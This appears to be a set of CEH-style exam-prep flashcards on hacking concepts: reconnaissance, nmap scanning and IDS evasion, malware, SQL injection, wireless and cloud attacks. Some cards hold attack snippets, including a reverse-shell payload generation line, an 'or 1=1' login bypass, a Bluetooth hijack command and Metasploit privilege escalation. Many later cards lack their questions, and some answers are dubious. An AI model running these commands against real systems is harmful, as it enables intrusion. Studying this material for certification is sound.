Fast Track Flashcards

Question 1

Q

Reconnaissance

Answer

A

Cyber Kill Chain stage that precedes the Weaponization stage.

Question 2

Q

Weaponization

Answer

A

Stage of the Cyber kill chain where you select or create a client side back door to send to users‚Äô collected email addresses

Question 3

Q

Delivery

Answer

A

Third step of the Cyber Kill Chain stage where attacker sends weaponized bundle to the victim using email, USB, etc.

Question 4

Q

Actions on objectives

Answer

A

Cyber kill chain stage where data exfiltration occurs

Question 5

Q

Unspecified proxy activities

Answer

A

Multiple domains pointing to the same host to switch quickly between the domains and avoid detection

Question 6

Q

White hat

Answer

A

Would notify the system owner and the software vendor if they found a zero-day vulnerability.

Question 7

Q

Gray Hats

Answer

A

Gray hats are the individuals who work both offensively and defensively at various times.

Question 8

Q

Reconnaissance

Answer

A

Reconnaissance refers to the preparatory phase in which an attacker gathers as much information as possible about the target prior to launching the attack. In this phase, the attacker draws on competitive intelligence to learn more about the target. It could be the future point of return, noted for ease of entry foran attack when more about the target is known on a broad scale. The reconnaissance target range may include the target organization‚Äôs clients, employees, operations, network, and systems.

Question 9

Q

Clearing Tracks

Answer

A

The attacker overwrites the server, system, and application logs to avoid suspicion

Question 10

Q

Determine the impact of the change

Answer

A

The first consideration when implementing a change is to determine the impact of the change

Question 11

Q

Operational Threat Intelligence

Answer

A

Operational threat intelligence provides information about specific threats against the organization. It provides contextual information about security events and incidents that help defenders disclose potential risks, provide greater insight into attacker methodologies, identify past malicious activities, and perform investigations on malicious activity in a more efficient way.

Question 12

Q

Technical Threat Intelligence

Answer

A

This intelligence is directly fed into the security devices in digital format to block and identify inbound and outbound malicious traffic entering the organization‚Äôs network.

Question 13

Q

Incident triage

Answer

A

Phase where type of attack, its severity, target, impact, method of propagation, and vulnerabilities exploited are analyzed

Question 14

Q

PCI-DSS

Answer

A

The Payment Card Industry Data Security Standard (PCI DSS) is a proprietary information security standard for organizations that handle cardholder information for major debit, credit, prepaid, e-purse, ATM, and POS cards

Question 15

Q

HIPAA

Answer

A

Regulations that protect personal medical records (PHI)

Question 16

Q

PHI

Answer

A

Personal Health Information (personal medical records)

Question 17

Q

SOX

Answer

A

Sarbanes-Oxley Act is designed to protect investors and the public by increasing the accuracy and reliability of corporate accounting disclosures

Question 18

Q

[site:]

Answer

A

site: This operator restricts search results to the specified site or domain.

Question 19

Q

[related:]

Answer

A

related: This operator displays websites that are similar or related to the URL specified.

Question 20

Q

[Filetype:]

Answer

A

Filetype: This operator allows you to search for results based on a file extension.

Question 21

Q

Reverse Image Search

Answer

A

Reverse image search helps an attacker in tracking the original source and details of images, such as photographs, profile pictures, and memes

Question 22

Q

Censys

Answer

A

Attackers use loT search engines, such as Censys, to gather information about the target loT devices, such as manufacturer details, geographical location, IP address, hostname, and open ports. Censys continually monitors every reachable server and device on the Internet, so one can search for and analyze them in real time.

Question 23

Q

Dark web footprinting

Answer

A

Uses specialized tools or search engines to encrypt browsing activity and navigate anonymously

Question 24

Q

Hootsuite

Answer

A

an automated geolocation tool

Question 25

Q

Website mirroring

Answer

A

Copying an entire website to a local drive to view the directory structure, file structure, external links, etc.

Question 26

Q

CeWL

Answer

A

An attacker uses the CeWL tool to gather a list of words from the target website and perform a brute-force attack on the email addresses gathered earlier.

Question 27

Q

Web-Stat

Answer

A

a tool to monitor websites, analyze the website’s traffic, and track the geographical location of the users visiting the website.

Question 28

Q

Infoga

Answer

A

a tool to track the emails of the target and extracts information such as sender identities, mail servers, sender IP addresses, and sender locations from different public sources.

Question 29

Q

Whois footprinting

Answer

A

Gathers domain information such as the target domain name, contact details of its owner, expiry date, and creation date

Question 30

Q

RIPE NCC

Answer

A

Regional Internet Registry for Europe

Question 31

Q

Bluto

Answer

A

An automated tool that can retrieve information about DNS zone data including DNS domain names, computer names, IP addresses, DNS records, and network Whois records.

Question 32

Q

ARIN

Answer

A

An online tool to retrieve information such as the network range of the target organization

Question 33

Q

Impersonation

Answer

A

Impersonation is a technique whereby an attacker pretends to be a legitimate or authorized person. Attackers perform impersonation attacks personally or use phones or other communication media to mislead targets and trick them into revealing information.

Question 34

Q

OSINT framework

Answer

A

OSINT Framework is an open source intelligence gathering framework that helps security professionals in performing automated footprinting and reconnaissance activities.

Question 35

Q

ACK flag probe scan

Answer

A

Discovers devices hidden by a restrictive firewall

Question 36

Q

-PP

Answer

A

Nmap / Zenmap ICMP Timestamp Ping Scan # nmap ‚-PP <target></target>

Question 37

Q

-PS

Answer

A

Nmap / Zenmap SYN Ping Scan # nmap ‚-PS <target></target>

Question 38

Q

nmap ‚-sn -PS < target IP address >

Answer

A

TCP SYN ping scan

Question 39

Q

TCP Maimon scan

Answer

A

Sends FIN/ACK probes and determines that an RST packet is sent in response by the target host, indicating that the port is closed

Question 40

Q

Stateful firewall

Answer

A

Does not respond with RST to ACK packet sent to a closed port

Question 41

Q

-sA

Answer

A

Nmap Ack flag probe scanning Attackers send an ACK probe packet with a random sequence number, and no response implies that the port is filtered (stateful firewall is present), whereas an RST response means that the port is not filtered

Question 42

Q

-sV

Answer

A

In Nmap, the -sV option is used to detect type and service versions.

Question 43

Q

Idle scanning

Answer

A

Uses a zombie system with low network activity and ip identification numbers

Question 44

Q

Banner grabbing

Answer

A

Using the -sV flag with Nmap

Question 45

Q

128

Answer

A

Windows OS TTL

Question 46

Q

-D

Answer

A

Nmap / Zenmap IP Address Decoy scan The IP address decoy technique refers to generating or manually specifying IP addresses of the decoys to evade IDS/firewalls. #nmap -D RND:10 [target]

Question 47

Q

-T0

Answer

A

Nmap / Zenmap Paranoid Timing Option The paranoid timing option makes the least noise which helps evade IDS #nmap ‚ÄîTO [target]

Question 48

Q

Linux OS

Answer

A

Uses TTL of 64 and Window size of 5840

Question 49

Q

Scanning networks

Answer

A

Assists in Drawing Network Diagrams Drawing a network diagram helps an attacker to identify the topology or architecture of a target network.

Question 50

Q

SMB

Answer

A

Runs on ports 139 and 445 TCP

Question 51

Q

389

Answer

A

Unsecured LDAP port, should change it to 636 - LDAPS

Question 52

Q

SNMP

Answer

A

Uses port UDP 161. If you find unencrypted SNMP traffic on your network, change to SNMP V3

Question 53

Q

< 03>

Answer

A

NetBIOS code for the messenger service

Question 54

Q

LNMIB2.MIB

Answer

A

Contains object types for workstation and server services

Question 55

Q

Jxplorer

Answer

A

Tool to anonymously query the LDAP service for sensitive information such as usernames, addresses, and departmental details.

Question 56

Q

SMTP Enumeration

Answer

A

SMTP provides 3 built-in-commands: VRFY - Validates users EXPN - Shows the actual delivery addresses of aliases and mailing lists RCPT TO - Defines the recipients of a message

Question 57

Q

DNS Cache Snooping

Answer

A

DNS cache snooping is a type of DNS enumeration technique in which an attacker queries the DNS server for a specific cached DNS record. By using this cached record, the attacker can determine the sites recently visited by the user.

Question 58

Q

FTP Enumeration

Answer

A

The File Transfer Protocol (FTP) is used to transfer files over TCP, and its default port is 21.

Question 59

Q

NTLM

Answer

A

Can be used to secure an LDAP service against anonymous queries

Question 60

Q

LDAP Enumeration Countermeasures

Answer

A

By default, LDAP traffic is transmitted unsecured (port 389); therefore, use Secure Sockets Layer (SSL) or STARTTLS technology to encrypt the traffic (port 636).

Question 61

Q

False positives

Answer

A

Vulnerabilities found in a tool-based vulnerability assessment that are not true vulnerabiities

Question 62

Q

Medium

Answer

A

(CVSS) v3.0 severity ratings range 4.0-6.9

Question 63

Q

4.0-6.9

Answer

A

(CVSS) v3.1 medium severity ratings range

Question 64

Q

Remediation

Answer

A

Process of applying fixes on vulnerable systems to reduce the impact and severity of vulnerabilities

Answer 65

A

The phases involved in vulnerability management are: 1. Identify assets and create a baseline 2. Vulnerability scan 3. Risk assessment 4. Remediation 5. Verification 6. Monitor

Answer 66

A

Passive assessments sniff the traffic present on the network to identify the active systems, network services, applications, and vulnerabilities. Passive assessments also provide a list of the users who are currently accessing the network.

Answer 67

A

External assessment examines the network from a hacker‚Äôs point of view to identify exploits and vulnerabilities accessible to the outside world. These types of assessments use external devices such as firewalls, routers, and servers.

Answer 68

A

Host-based scanners assess systems to identify vulnerabilities such as native configuration tables, incorrect registry or file permissions, and software configuration errors.

Answer 69

A

Scans other machines on the network to identify vulnerabilities.

Answer 70

A

Wireless network assessment determines the vulnerabilities in an organization‚Äôs wireless networks. Many networks still use weak and outdated security mechanisms and are open to attack.

Answer 71

A

Can identify vulnerabilities in user directories, registries, native configuration tables, incorrect registry or file permissions, and software configuration errors.

Answer 72

A

After finding services, it selects vulnerabilities on each machine and starts to execute only those relevant tests.

Answer 73

A

Locating nodes 2. Performing service and OS discovery on them 3. Testing those services and OS for known vulnerabilities

Answer 74

A

May involve infecting a system with malware and using phishing to gain credentials to a system or web application

Answer 75

A

In this type of attack, a dictionary file is loaded into a cracking application that runs against user accounts. This dictionary is a text file that contains several dictionary words commonly used as passwords. The program uses every word present in the dictionary to find the password.

Answer 76

A

Steps to perform an internal monologue attack: 1. The attacker disables the security controls of NetNTLMv1 by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLM Traffic. 2. The attacker extracts all the non-network logon tokens from all the active processes to masquerade as legitimate users.

Answer 77

A

John the Ripper hashcat THC-Hydra Medusa

Answer 78

A

Extra data is added to a password before hashing to defeat Rainbow tables

Answer 79

A

LHOST=10.10.10.13 LPORT=4444 -f exe > shell.exe generates reverse TCP shellcode for Windows

Answer 80

A

char buff[12];

Answer 81

A

MITRE maintains a CVE database that contains details of the latest vulnerabilities. Attackers can search MITRE CVE to discover vulnerabilities that exist in the target system.

Answer 82

A

Use Metasploit commands such as getsystem to gain administrative-level privileges and extract password hashes of the admin/user accounts.

Answer 83

A

The kernel is the core of an OS. A kernel-level rootkit runs in Ring-O with the highest OS privileges. These cover backdoors on the computer and are created by writing additional code, or by substituting portions of kernel code with modified code via device drivers in Windows or loadable kernel modules in Linux.

Answer 84

A

Maintains a log of typed input

Answer 85

A

Embedding malicious data into the DNS protocol packets that even DNSSEC cannot detect

Answer 86

A

Files in UNIX / Linux can be hidden just by appending a dot (.) in front of a file name

Answer 87

A

Causes annoying pop-ups with advertisements

Answer 88

A

remains without being detected for a long time and obtains sensitive information without sabotaging the organization.

Answer 89

A

Initial Intrusion phase of APT lifecycle includes: 1. Deployment of malware 2. Establishment of outbound connection

Answer 90

A

Attacker attempts to enter the target network using techniques such as sending spear-phishing emails and exploiting vulnerabilities on publicly available servers

Answer 91

A

Mirai loT botnet Trojan is still considered as one of the most notorious DDoS attack Trojans

Answer 92

A

A stealth virus hides from antivirus software by hiding the original size of the file or temporarily placing a copy of itself in some other system drive, thus replacing the infected file with the uninfected file that is stored on the hard drive.

Answer 93

A

can cipher itself and change its own code

Answer 94

A

Computer worms are standalone malicious programs that replicate, execute, and spread across network connections independently without human intervention.

Answer 95

A

AV tools are unable to find

Answer 96

A

Attackers commonly use social engineering techniques such as phishing to spread fileless malware to the target systems. They send spam emails embedded with malicious links to the victim. When the victim clicks on the link, he/she will be directed to a fraudulent website that automatically loads Flash and triggers the exploit.

Answer 97

A

A free service that analyzes suspicious files

Answer 98

A

It is a self-extracting RAR file containing two components. One is the bypass component, and the other is the service component. The bypass component is used for the enumeration of network resources and it either finds writable share drives using the Server Message Block (SMB) or tries to brute-force user accounts, including the administrator account.

Answer 99

A

A tool to send fake ARP messages over the target network to link a MAC address with the target system’s IP address

Answer 100

A

MAC flooding involves the flooding of the CAM table with fake MAC address and IP pairs until it is full

Answer 101

A

Attack that leases all the DHCP addresses available in the DHCP scope.

Answer 102

A

Attacker plugs in a rogue switch with a lower priority than any other switch to make it a root bridge

Answer 103

A

first step in conducting a DNS cache poisoning

Answer 104

A

The attacker preteds to be technical support staff of the targeted organization’s software vendors or contractors

Answer 105

A

Attackers target a person inside the company online, pretending to be an attractive person. They then begin a fake online relationship to obtain confidential information about the target company

Answer 106

A

The attacker may impersonate a technician and gather sensitive information by scanning terminals for passwords, searching for important documents on employees‚Äô desks, rummaging through bins.

Answer 107

A

Scareware is often seen in pop-ups that tell the target user that their machine has been infected with malware. Further, these pop-up ads always have a sense of urgency and tell the victim to quickly download the software if they want to get rid of the supposed virus.

Answer 108

A

Redirects to malicious websites by sending a malicious link which appears to be real by email.

Answer 109

A

The attacker redirects web traffic to a fraudulent website by installing a malicious program on a personal computer or server Can be performed in two ways: DNS Cache Poisoning and Host File Modification

Answer 110

A

Phishing tool a>

Answer 111

A

A whaling attack is a type of phishing that targets high profile executives like CEO, CFO, politicians, and celebrities who have complete access to confidential and highly valuable information.

Answer 112

A

In this type of attack, attackers create fake or spoofed TCP sessions by carrying multiple SYN, ACK, and RST or FIN packets to perform DDOS attacks against target networks, exhausting their network resources.

Answer 113

A

A DDoS attack. Partial HTTP requests are sent to open multiple connections and slow down the application.

Answer 114

A

Collects information about a large number of vulnerable machines to create a list, then infects the machines to create a botnet

Answer 115

A

Implement cognitive radios in the physical layer to handle jamming and scrambling attacks

Answer 116

A

document.write(‘<img></img>);

Answer 117

A

Attacker obtains a valid session ID and feeds the same session ID to the victim. The session ID links the victim to attacker‚Äôs account page. Victim‚Äôs sensitive payment details entered in a form are linked to attacker‚Äôs account.

Answer 118

A

Monitoring established traffic between the victim and host to predict ISN, using the ISN to spoof packets sent to the host, hanging the victims connection, and impersonating the victim to communicate with the host.

Answer 119

A

Burp Suite contains the following key components: An intercepting proxy, which allows the user to inspect and modify traffic between their browser and the target application An intruder tool for performing powerful customized attacks to find and exploit unusual vulnerabilities A sequencer tool for testing the randomness of session tokens

Answer 120

A

Sends data using encryption and digital certificates

Answer 121

A

A VPN creates a safe and encrypted tunnel over a public network to securely send and receive sensitive information.

Answer 122

A

IDS raises an alarm when no attack has taken place

Answer 123

A

DMZ should always be used when the company has publicly available servers

Answer 124

A

Webserver should be internet facing, but application and database servers should not.

Answer 125

A

an appealing isolated environment for hackers

Answer 126

A

Encoding packets with Unicode characters. IDS cannot recognize the packets, but web server can decode them.

Answer 127

A

https://proxify.com http://www.guardster.com http://anonymouse.org

Answer 128

A

Runs on port 53 a>

Answer 129

A

An attacker can identify the presence of honeyd honeypot by performing time-based TCP fingerprinting methods (SYN proxy behavior).

Answer 130

A

The file that determines the basic configuration (specifically activities, services, broadcast receivers, etc.) in an Android application

Answer 131

A

When the user enters a legitimate URL in a browser, the settings will redirect to the attacker‚Äôs fake site. User may be prompted to re-enter credentials as if they have never visited the site before, and the site may not be secure.

Answer 132

A

dot dot slash (../) character string in a url to navigate to a parent directory on a web server

Answer 133

A

can be misconfigured to provide verbose error messages

Answer 134

A

a designer can utilize a URL such as https://xyz.com/feed.php ?url=externalsite.com/feed/t o to obtain a remote feed

Answer 135

A

a file to discover the structure of a website

Answer 136

A

By performing web server footprinting, an attacker can gather valuable system-level data such as account details, OS‚Äôs, software versions, server names, and database schema details

Answer 137

A

Failure would be not applying fixes in a timely fashion. Example: Company is breached several months after a fix is available from the vendor

Answer 138

A

minimum number of users Helps secure the user accounts on the web server

Answer 139

A

Syhunt Hybrid crawls websites and detects XSS, directory traversal problems, fault injection, SQL injection, attempts to execute commands, and several other attacks.

Answer 140

A

Netsparker Burp Suite

Answer 141

A

Web Services Security (WS-Security) plays an important role in securing web services. It is an extension of SOAP and aims to maintain the integrity and confidentiality of SOAP messages as well as to authenticate users.

Answer 142

A

Server-side Includes is an application feature that helps designers to auto-generate the content of the web page without manual involvement. Such an application accepts remote user inputs and uses them on the page.

Answer 143

A

XML External Entity malicious request example:

Answer 144

A

It is a type of unvalidated redirect attack whereby the attacker first identifies the most visited website of the target, determines the vulnerabilities in the website, injects malicious code into the vulnerable web application, and then waits for the victim to browse the website. Once the victim tries to access the website, the malicious code executes, infecting the victim.

Answer 145

A

Attacker creates a transparent ‚Äòiframe‚Äô in front of the URL which the victim attempts to click, but actually he/she clicks on the content or URL that exists in the transparent ‚Äòiframe‚Äô which is setup by the attacker.

Answer 146

A

Attackers perform character by character password examination and exploit the timing information to determine the position where the password comparison failed. Then, attackers use this data to determine the target user‚Äôs password.

Answer 147

A

Banner grabbing using wget weet -S [target]

Answer 148

A

Gobuster tool‚Äôs fastest option

Answer 149

A

When the application specifies which field is incorrect or pops up reasons for denying access, attackers can easily exploit that field by trying a large set of similar names or words to enumerate valid data required to access the application. The list of enumerated data can also be used later for social engineering.

Answer 150

A

WS-Address provides additional routing information in the SOAP header to support asynchronous communication.

Answer 151

A

a web service that uses HTTP methods such as PUT, POST, GET, and DELETE and can improve the overall performance, visibility, scalability, reliability, and portability of an application.

Answer 152

A

User-defined HTTP callback or push APIs that are raised based on trigger events

Answer 153

A

No proper attribute-based access control (ABAC) validation allows attackers to gain unauthorized access to API objects or perform actions such as viewing, updating, or deleting

Answer 154

A

Server-side Include Injection Avoid using pages with file name extensions such as .stm, .shtm, and .shtml to prevent attacks.

Answer 155

A

Vulnerability disclosure program opened by companies

Answer 156

A

–’ and UserPassword = ‘123456‚Äò SQL command executed by the server when you enter into a login form: Username: attack‚Äô or 1=1– Password: 123456

Answer 157

A

In a UNION SQL injection, an attacker combines a forged query with a query requested by the user using a UNION clause. The result of the forged query will be appended the result of the original query, which makes it possible to obtain the values of fields from other tables.

Answer 158

A

Use the UNION operator to combine the result sets of two or more SELECT statements if they have the same structure

Answer 159

A

Attacker can steal data by asking a series of true or false questions through SQL statements.

Answer 160

A

SQL injection attack testing the response time of a true or false response.

Answer 161

A

SQL injection attack to determine whether the database will return true or false results for user IDs.

Answer 162

A

May use DNS requests to retrieve information for the attacker

Answer 163

A

Placing characters such as “’ or ‘1’=’1”” in any basic injection statement such as “or 1=1.‚Äù

Answer 164

A

Whitelist validation is a best practice whereby only the list of entities (i.e., data type, range, size, value, etc.) that have been approved for secured access is accepted.

Answer 165

A

Was designed to mimic wired encryption.

Answer 166

A

It is mainly used to deliver password-based authentication using the SAE protocol, also known as Dragonfly Key Exchange, which replaces the PSK concept used in WPA2-Personal. It is resistant to offline dictionary attacks and key recovery attacks.

Answer 167

A

allows 192-bit minimum-strength security protocols such as GCMP-256, HMAC-SHA384, and ECDSA using a 384-bit elliptic curve.

Answer 168

A

Adversary tricks a victim into reinstalling an already-in-use key. Associated parameters such as the incremental transmit packet number and receive packet number are reset to their initial values.

Answer 169

A

Attackers use the Wash command-line utility to identify WPS-enabled APs in the target wireless network.

Answer 170

A

An evil twin is a wireless AP that pretends to be a legitimate AP by imitating its SSID. Often won’t require authentication where the legitimate AP does.

Answer 171

A

Wireless attack where attacker launches an MITM attack using a fake communication tower intercepting the user data, and redirecting to malicious site.

Answer 172

A

WPAS3 encryption

Answer 173

A

To launch this attack, the client and AP should support both WPA3 and WPA2 encryption mechanisms. Here, the attacker forces the user to follow the older encryption method, WPA2, to connect to the network.

Answer 174

A

Theft of information from a wireless device through Bluetooth

Answer 175

A

Btlejacking Using BtleJack Start hijacking the connection using the following command: btlejack -f Ox9c68fd30 -t -m Ox 1 fffTTtTTT

Answer 176

A

To make a wireless network undiscoverable

Answer 177

A

Attackers drive around with Wi-Fi-enabled laptops installed with a wireless discovery tool to map out open wireless networks.

Answer 178

A

Legitimate smartphone apps are replaced by deceptive applications that appear legitimate.

Answer 179

A

A spearphone attack allows Android apps to record loudspeaker data without any privileges.

Answer 180

A

The attack vector mainly depends on a process called Over-the-Air (OTA) provisioning, which is mainly used by network operators. The attacker exploits the mobile device by sending messages that seem to be genuine from the network operator.

Answer 181

A

patches the kernel so jailbroken after each successive reboot

Answer 182

A

Vulnerability that can be exploited by an attacker to read messages and emails by exploiting the ‚ÄúiTunes Wi-Fi Sync‚Äù feature.

Answer 183

A

Trident is capable of taking complete control of the target mobile device, and it allows attackers to monitor and track all the user activities. It also allows attackers to record audio, capture screenshots, and monitor all phone calls and SMS messages.

Answer 184

A

Reverse engineering is used to disassemble a software program or a mobile application to analyze its design flaws and fix any bugs that are residing in it.

Answer 185

A

based on the IEEE 203.15.4 standard (This is a typo in the book and on the exam ‚Äî the actual standard is 802.15.4)

Answer 186

A

These types of attacks occur when faults or glitches are injected into the power supply that can be used for remote execution, also causing the skipping of key instructions. Faults can also be injected into the clock network used for delivering a synchronized signal across the chip.

Answer 187

A

Attacker targets the specified frequency 2. After obtaining the frequency, the attacker can capture the original data when the commands are initiated by the connected devices 3. Once the original data is collected, the attacker uses free tools such as URH (Universal Radio Hacker) to segregate the command sequence 4. Attacker then injects the segregated command sequence on the same frequency

Answer 188

A

Helps in finding the details of devices and the certification granted to them.

Answer 189

A

loTSeeker will scan a network for specific types of loT devices to detect whether they are using the default, factory-set credentials.

Answer 190

A

Port commonly used by compromised IOT devices to spread malware

Answer 191

A

Attackers often try to compromise an HMI system as it is the core hub that controls critical infrastructure. If attackers gain access over HMI systems, they can cause physical damage to the SCADA devices (industrial automation components) or collect sensitive information related to the critical architecture that can be used later to perform malicious activities.

Answer 192

A

Using the above command, attackers can gather information such as the name of the vendor, product code and name, device name, IP address, etc.

Answer 193

A

Empowers manufacturers and utiity companies to ensure the reliability of their industrial networks confidently to avoid downtime and disruption of service continuity.

Answer 194

A

Subscriber is responsible for is the management of users. The provider is responsible for the hardware, operating system, and software administration including patching and monitoring.

Answer 195

A

Infrastructure as a Service requires the subscriber to take the most responsibility of maintenance of resources

Answer 196

A

A group of users or organizations share a cloud environment

Answer 197

A

Provides internet connectivity and transport services between the organization and the cloud service provider

Answer 198

A

A cloud carrier acts as an intermediary that provides connectivity and transport services between CSPs and cloud consumers.

Answer 199

A

Validates image contents, signs images, and sends them to the registries.

Answer 200

A

Docker provides a PaaS through OS-level virtualization and delivers containerized software packages. This technology isolates applications from the underlying infrastructure for faster software delivery.

Answer 201

A

A component that can process API requests and handle various Docker objects, such as containers, volumes, images, and networks.

Answer 202

A

Kube-scheduler is a master component that scans newly generated pods and allocates a node for them. It assigns the nodes based on factors such as the overall resource requirement, data locality, software/hardware/policy restrictions, and internal workload interventions.

Answer 203

A

The difficulties experienced by a user when migrating from in-house systems or from one cloud service provider to another due to the lack of tools, procedures, or standard data formats, poses potential threats to data, application, and service portability

Answer 204

A

The failure of synchronizing clocks at the end systems can affect the working of automated tasks. For example, if the cloud computing devices do not have synchronized or matched times, then timestamp inaccuracy constitutes the network administrator unable to analyze the log files for any malicious activity accurately.

Answer 205

A

Attackers initiate spear-phishing emails with custom-made malware to compromise the accounts of staff or cloud service firms to obtain confidential information

Answer 206

A

Cloudborne is a vulnerability residing in a bare-metal cloud server that enables attackers to implant malicious backdoor in its firmware.

Answer 207

A

May involve phone calls posing as a legitimate employee or sending phishing emails

Answer 208

A

The Zero Trust model is a security implementation that by default assumes every user trying to access the network is not a trusted entity and verifies every incoming connection before allowing access to the network.

Answer 209

A

64-bit blocks, 3 keys, 56 bit keys

Answer 210

A

Serpent involves 32 rounds of computational operations that include substitution and permutation operations on four 32-bit word blocks using 8-variable S-boxes with 4-bit entry and 4-bit exit. It uses a 128-bit symmetric block cipher with key sizes of 128, 192, or 256 bits.

Answer 211

A

CAST-128 is a symmetric-key block cipher having: A classical 12-or 16-round Feistel network with a block size of 64 bits. 8x32-bit S-boxes ($1, S2, S3, S4) based on bent functions, modular addition and subtraction, key-dependent rotation, and XOR operations. A masking key (Km1) and a rotation key (Kr1) for performing its functions.

Answer 212

A

Hardware on a computer’s motherboard that generates encryption keys

Answer 213

A

Encryption algorithm uses 128-bit block size, and key size up to 256 bits

Answer 214

A

Sender‚Äôs private key signs a message by encrypting the hash (or checksum)

Answer 215

A

Sender‚Äôs public key verifies (confirms) a message signature

Answer 216

A

Recipient‚Äôs public key is used to encrypt a message

Answer 217

A

GNU Privacy Guard (GPG) is a software replacement of PGP and free implementation of the OpenPGP standard that is used to encrypt and decrypt data.

Answer 218

A

In WOT, every PGP user in the network has a ring of public keys to encrypt the data, and they introduce many other users whom they trust. In this trust model, a user encodes the data with the receiver‚Äôs public key that is decrypted only by the receiver‚Äôs private key.

Answer 219

A

Bitlocker keys can be stored in, and recovered from Active Directory

Answer 220

A

In the key stretching technique, the initial key is given as input to an algorithm that generates an enhanced key. The key must be sufficiently resistant to brute-force attacks.

Answer 221

A

A hash injection/PtH attack allows an attacker to inject a compromised hash into a local session and use the hash to validate network resources.

Answer 222

A

Duplicate MAC addresses in your ARP table can indicate an ARP spoofing attack

Answer 223

A

In this query, -u specifies the target URL and –dbs enumerates DBMS databases.

Answer 224

A

Same private key certificate is used on a different server that allows SSLv2 connections. Which can leak key information

Answer 225

A

Problem with social media posts that ask personal questions under the guise of getting to know you better

Answer 226

A

Bettercap is the most suitable tool for conducting a session hijacking attack on a wireless network with WPA-PSK security, due to its advanced capabilities in network analysis and versatility in handling various security protocols.

Answer 227

A

A Brute Force attack directly leverages the absence of an account lockout policy and the presence of detailed error messages that provide feedback on login attempts.

Answer 228

A

Raw Sniffing allows for the passive capture of all network traffic, providing a comprehensive view of data flow without actively manipulating network behavior.

Answer 229

A

A ‚Äòblind‚Äô SQL Injection attack allows for data extraction through true or false responses from the application, effectively circumventing input validation measures that block suspicious patterns.

Answer 230

A

Error-based SQL Injection takes advantage of the detailed error messages provided by the application to understand the database structure and formulate effective injection queries.

Answer 231

A

Applying a digital signature mechanism ensures the integrity and authenticity of data upon retrieval, verifying that it hasn’t been altered or tampered with since being signed.

Answer 232

A

Implementing SSL/TLS encryption for data transmission ensures secure and encrypted communication, effectively preventing Man-in-the-Middle attacks from intercepting or manipulating the data.

Answer 233

A

Data encryption with AES-256 offers a high level of security and performs better than older algorithms like 3DES, while also efficiently balancing security and performance needs in the face of potential quantum computing threats.

Answer 234

A

Implementing WPA2 or WPA3 encryption is a suitable security measure, as it provides strong protection for the Wi-Fi network and is straightforward to set up and manage, making it ideal for an environment with limited technical knowledge.

Answer 235

A

Applying asymmetric encryption with RSA and using the private key for signing ensures confidentiality through encryption and non-repudiation by using the private key for digital signing.

Answer 236

A

Enabling encryption on the wireless network is the most effective first step to mitigate the risk of Wi-Fi eavesdropping, as it secures all data transmitted over the network, making it difficult for unauthorized individuals to intercept and understand the communications.

Answer 237

A

Implementing WPA3 encryption for the store’s Wi-Fi network is the most suitable measure to mitigate the risk of Wardriving attacks, as it provides strong security without affecting the customer experience of accessing in-store Wi-Fi.

Answer 238

A

Passive reconnaissance techniques such as WHOIS lookups, NS lookups, and web research, allow for the collection of valuable information without sending traffic to the target network, thus avoiding detection by intrusion detection systems.

Answer 239

A

Using a Cloud Access Security Broker (CASB) is the best solution for achieving unified security management across multiple cloud platforms, as it enables consistent enforcement of security policies, threat monitoring, and visibility into cloud resources.

Answer 240

A

q=17, T=220: In this scenario, the total delay caused by the attacker (‘q*d’ = 221 seconds) exceeds the threshold of 200, indicating a high likelihood of triggering a security alert

Answer 241

A

MAC flooding can overwhelm the switch’s memory, a technique that can cause the switch to behave like a hub, thus enabling the attacker to capture packets intended for other hosts in the network.

Answer 242

A

Employing a tool like Sublist3r, which is designed to enumerate the subdomains of websites using OSINT (Open Source Intelligence), as it specifically targets the discovery of subdomains, making it highly efficient for this particular task.

Answer 243

A

Displaying a captive portal page that warns users about the possibility of Evil Twin attacks is the most effective and user-friendly measure, as it educates users about the risk without requiring them to install additional software or change their connection habits.

Answer 244

A

Organize regular employee awareness training regarding social engineering techniques and preventive measures, as this is crucial in educating the workforce about the nature of social engineering attacks, which often exploit human psychology rather than technological vulnerabilities.

Answer 245

A

Using network segmentation to isolate loMT devices from the main network is the main recommendation, as it limits the potential impact of a breach and reduces the risk of loMT devices being used as entry points for network-wide attacks.

Answer 246

A

Vulnerability scanning software is limited in its ability to detect vulnerabilities at a given point in time, meaning it might not identify new vulnerabilities that emerge after the scan, which is particularly relevant given the dynamic nature of the network environment described, including legacy applications and outdated systems.

Answer 247

A

A Cross-Site Scripting (XSS) attack can bypass JavaScript client-side sanitization and exploit the exposure of session cookies not set with the HttpOnly flag

Answer 248

A

The total number of high, medium, and low-risk vulnerabilities detected throughout the network would NOT be typically included in the detailed documentation for a specific vulnerability, as this information is more relevant to an overall network vulnerability assessment rather than the documentation of a particular vulnerability.

Answer 249

A

A vulnerability with a base metric score of 7, a temporal metric score of 8, and an environmental metric score of 5, has an overall high severity, the likelihood of exploitability is increasing over time, and it has a medium impact in their specific environment

Answer 250

A

In a system hacking scenario where passwords are common words with added numbers, a Hybrid Attack, which combines dictionary and brute-force methods, is most likely to succeed.

Answer 251

A

In a scenario where a malicious Dynamic Link Library (DLL) is loaded in the application directory without a fully qualified path, the likely privilege escalation technique used is DLL Hijacking.

Answer 252

A

Spoofing In network-level session hijacking, inserting a machine between a client and server to reroute packets is indicative of a Man-in-the-middle Attack Using Forged ICMP and ARP Spoofing.

Answer 253

A

Using a dedicated network for a smart home system, separate from the home’s main Wi-Fi network, effectively isolates devices, enhancing security by ensuring that if one device is compromised, the rest remain secure.

Answer 254

A

Using the char encoding function to convert hexadecimal and decimal values into characters that pass through SQL engine parsing is an effective SQL Injection evasion technique for bypassing signature-based IDS by altering the query format without changing its logic.

Answer 255

A

Changing the NTLM password hash used to encrypt a ST will invalidate a stolen Ticket Granting Service ticket and prevent the attacker from using it even if they successfully crack it.

Answer 256

A

Initiating DNS tunneling to communicate with the command-and-control server allows the adversary to hide malicious traffic within legitimate DNS traffic, making it harder to detect and block.

Answer 257

A

Requesting a service ticket for the service principal name of the target service account is the next step ina Kerberoasting attack after obtaining a valid user authentication ticket (TGT), allowing the analyst to target specific service accounts for password compromise.

Answer 258

A

Contact your Internet Service Provider (ISP) for assistance, as they can provide immediate support and implement measures like traffic filtering to mitigate a Distributed Denial of Service (DDoS) attack.

Answer 259

A

f=490: The server can handle 490 SYN packets per second. With ‘s’ exceeding ‘f’ by 10, the response time shoots up (210 = 1024 times the usual response time), indicating a system overload.

Answer 260

A

The ‘use_ssl = True‚Äô in the server object creation, is necessary for establishing a secure connection with an LDAP server that only accepts secure connections.

Answer 261

A

